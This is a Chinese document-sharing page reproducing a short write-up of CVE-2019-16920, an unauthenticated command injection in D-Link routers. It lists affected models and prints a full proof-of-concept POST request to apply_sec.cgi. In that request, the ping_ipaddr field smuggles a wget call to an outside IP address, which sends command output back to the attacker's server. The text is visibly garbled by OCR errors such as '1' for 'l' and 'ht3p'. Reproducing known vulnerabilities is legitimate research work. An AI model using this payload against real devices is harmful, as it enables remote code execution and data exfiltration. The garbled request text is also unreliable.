《(CVE-2019-16920)D-Link rce.docx》由会员分享,可在线阅读,更多相关《(CVE-2019-16920)D-Link rce.docx(1页珍藏版)》请在第一文库网上搜索。
1、(CVE-2019-16920)D-1inkrce一、漏洞简介D-1ink设备中出现未经身份验证的命令注入漏洞(FG-VD-19-117CVE201916920),该漏洞可造成远程代码执行。二、漏洞影响DIR-655,DIR-8661,DIR-652,DHP-1565,DIR-8551,DAP-1533,DIR-8621,DIR-615,DIR-835,DIR-825等三、复现过程poc攻击者可以利用该漏洞将任意字符串发送到“PingTest”网关接口来实现命令注入。POST/app1y_sec.cgiHTTP/1.1Host:192.168.232.128User-Agent:Mozi11a
2、/5.0(Macintosh;Inte1MacOSX10.14;rv:69.0)Gecko20100101Firefox/69.0Accept:texthtm1,app1icationxhtm1+xm1japp1icationxm1jq=0.9,*jq=0.8Accept-1anguage:vi-VN,vijq=0.8,en-US;q=0.5,enjq=0.3Accept-Encoding:gzip,def1ateContent-Type:app1ication/X-WWW-form-urIencodedContent-1ength:131Connection:c1oseReferer:htt
3、p:/192.168.232.128/1ogin_pic.aspCookie:uid=1234123Upgrade-Insecure-Requests:1htm1_response_page=1ogin_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awgt%20-P%25tmp%20ht3p:/45.76.148.31:4321/?$(echo1234)“该漏洞始于一次错误的身份验证过程。当我们要进入管理页面时,需要执行登录操作。此时,我们会对app1y_sec.cgi页面发出POST请求,其中包含一个操作ping_testo研究后发现,我们可通过参数Ping_ipaddr执行命令注入。虽然响应是返向登录页面,但操作Ping1eSt仍然执行了,我们通过参数ping_ipaddr注入的命令echo1234成功执行,并将结果发送回我们的服务器。”image